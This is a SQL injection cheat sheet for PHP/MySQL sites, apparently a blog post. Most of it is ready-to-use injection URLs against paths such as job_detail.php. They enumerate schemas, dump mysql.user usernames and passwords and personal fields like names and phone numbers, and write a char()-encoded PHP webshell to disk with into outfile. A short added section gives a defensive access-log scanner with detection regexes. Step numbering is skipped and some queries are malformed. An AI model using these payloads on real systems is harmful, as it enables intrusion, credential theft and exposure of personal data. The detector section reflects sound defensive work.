PHP injection

1. Determine whether injection exists: append '; and 1=1; and 1=2
2. Determine the version: and ord(mid(version(),1,1))>51 as a substitute.
5. Determine whether the database connection account has write permission: and (select count(*) from mysql.user)>0 select 1,concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.SCHEMA limit 0,1/*

First use union select 0,1,TABLE_NAME,3,4 FROM INFORMATION_SCHEMA.TABLES limit 0,1/* to dump all the table names
Then use union select 0,1,COLUMN_NAME,3,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=[name of the table to query]17,1/*
Works every time
http://localhost/inject.php?id=1 and 1=2 union select concat(char(124,13,10),SCHEMA_NAME,char(124,13,10)),2,3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES where information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327 limit 2,1

union select concat(char(124,13,10),TABLE_NAME,char(124,13,10)),2,3,4,5,6,7,8 FROM information_schema.SCHEMATA where information_schema.SCHEMATA.SCHEMA_NAME=0x276773726327

union select 1,2,load_file('c:\123.txt'),4,5,6,into outfile'123.php'

/* Querying related information
/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),@@basedir,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 /* and 1=1

current_user() session_user() system_user() @@datadir @@tmpdir @@version_compile_os

job_detail.php?InfoId=347 and 1=2 union select 1,2,3,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),5,6,7,8 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1
Dump database usernames and passwords
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),password,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 0,1) t order by user desc)t limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 1,1) t order by user desc)t limit 1/* and 1=1

and 1=2 union select 1,concat(char(94),char(94),char(94),user,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from mysql.user order by user limit 4,1) t order by user desc)t limit 1/* and 1=1

/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),count(*),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from information_schema.tables group by table_schema order by table_schema)t limit 1/* and 1=1

| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME         | UPDATE_TIME         | CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+---------------------+------------+-----------------+----------+----------------+---------------+
| NULL          | chinapiao    | air_city   | BASE TABLE | MyISAM |      10 | Dynamic    |        884 |             39 |       34740 | 281474976710655 |        11264 |         0 |           1982 | 2009-04-09 21:22:59 | 2009-04-09 21:40:25 | NULL       | utf8_general_ci |     NULL |                |               |
Dump all database names
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 0,1) t order by table_schema desc)t limit 1/* and 1=1
^^^information_schema^^^
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 1,1) t order by table_schema desc)t limit 1/* and 1=1
^^^league^^^
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_schema,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 2,1) t order by table_schema desc)t limit 1/* and 1=1
^^^mysql^^^

Query the databases with a select statement
inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 3,1) t order by table_schema desc)t limit 1)>120 and 1=1
inject.php?id=1 and (select ascii(substr(table_schema,8,1)) from (select * from (select * from information_schema.tables group by table_schema order by table_schema limit 3,1) t order by table_schema desc)t limit 1)>116 and 1=1

/* Dump tables
Cross-database query to dump tables
job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables where table_schema=0x6c6561677565 limit 1/* and 1=1
Cross-database query to dump columns
/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns where table_name=0x6962665f656d61696c5f6c6f6773 and table_schema=0x6c6561677565 limit 1/* and 1=1

job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables where table_schema=0x73697365 limit 1/* and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 0,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 1,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 2,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),table_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.tables where table_schema=0x73697365 order by table_schema limit 3,1) t order by table_schema desc)t limit 1/* and 1=1 HTTP/1.1

/* Dump columns

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 1,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),column_name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from information_schema.columns where table_name=0x6d6174726963756c6174657232303035 and table_schema=0x73697365 order by 1 limit 2,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/* Guess column values

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),cast(count(*) as char),char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from matriculater2005 where 1=1 limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),numberid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),name,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),phone,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),linkman,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),specialityid,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(94),char(94),char(94),speciality,char(94),char(94),char(94)),1,1,1,1,1,1,1,1,1,1,1 from (select * from (select * from matriculater2005 where 1=1 order by 1 limit 0,1) t order by 1 desc)t limit 1/* and 1=1 HTTP/1.1

/* Write a PHP one-line webshell
<?require($_REQUEST['evil_file_path']);echo "zwell has been here"?>

GET /job_detail.php?InfoId=347 and 1=2 union select 1,concat(char(60),char(63),char(114),char(101),char(113),char(117),char(105),char(114),char(101),char(40),char(36),char(95),char(82),char(69),char(81),char(85),char(69),char(83),char(84),char(91),char(39),char(101),char(118),char(105),char(108),char(95),char(102),char(105),char(108),char(101),char(95),char(112),char(97),char(116),char(104),char(39),char(93),char(41),char(59),char(101),char(99),char(104),char(111),char(32),char(34),char(122),char(119),char(101),char(108),char(108),char(32),char(104),char(97),char(115),char(32),char(98),char(101),char(101),char(110),char(32),char(104),char(101),char(114),char(101),char(34),char(63),char(62),char(13),char(10)),1,1,1,1,1,1,1,1,1,1,1 into outfile '/etc/zwell.php'/* and 1=1 HTTP/1.1
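
The requests listed above share a small set of markers (boolean probes, union select, information_schema and mysql.user lookups, chained char() calls, hex literals, load_file / into outfile) that a defender can match in web-server access logs. The following is an added example, not part of the original page: the rule names, severity labels and sample log lines are constructed here, and it assumes logs in the common/combined format.

```python
import re
from urllib.parse import unquote_plus

# Markers drawn from the request shapes on this page (rule names are made up here).
RULES = {name: re.compile(rx, re.I) for name, rx in {
    "boolean_probe": r"\band\s+1\s*=\s*[12]\b",
    "union_select":  r"\bunion\s+(?:all\s+)?select\b",
    "schema_enum":   r"\binformation_schema\s*\.\s*\w+",
    "mysql_user":    r"\bmysql\s*\.\s*user\b",
    "char_chain":    r"(?:char\(\s*\d+(?:\s*,\s*\d+)*\s*\)\s*,\s*){3,}",
    "hex_literal":   r"=\s*0x[0-9a-f]{6,}",
    "blind_compare": r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid)\s*\(",
    "file_io":       r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b",
}.items()}
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (.*) HTTP/[\d.]+" (\d{3})')

def normalize(target):
    """Decode twice (double encoding), turn /**/ fillers into spaces, squeeze whitespace."""
    text = unquote_plus(unquote_plus(target))
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def classify(target):
    text = normalize(target)
    return {name for name, rx in RULES.items() if rx.search(text)}

def severity(hits):
    if "file_io" in hits:
        return "critical"  # file read/write attempt such as a webshell drop
    if hits & {"schema_enum", "mysql_user", "blind_compare"}:
        return "high"      # schema or credential enumeration
    return "low" if hits else "none"

def scan(lines):
    # Yields (client, severity, sorted rule names) for each suspicious log line.
    for line in lines:
        m = LOG_LINE.match(line)
        hits = classify(m.group(2)) if m else set()
        if hits:
            yield m.group(1), severity(hits), sorted(hits)

# Constructed access-log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /job_detail.php?InfoId=347 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /job_detail.php?InfoId=347%20and%201=2%20union%20select%201,table_name,1%20from%20information_schema.tables%20where%20table_schema=0x73697365 HTTP/1.1" 200 498',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /inject.php?id=1/**/and/**/(select/**/ascii(substr(table_schema,8,1))/**/from/**/information_schema.tables)>116 HTTP/1.1" 200 20',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /job_detail.php?InfoId=347+union+select+1,concat(char(60),char(63),char(114),char(101)),1+into+outfile+%27/tmp/x.php%27 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

Pattern matching of this kind is a triage aid for logs and WAF tuning; the fix for the endpoints themselves is parameterized queries and a database account without FILE privilege or access to mysql.user.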

Time: 2024-10-24 01:19:16
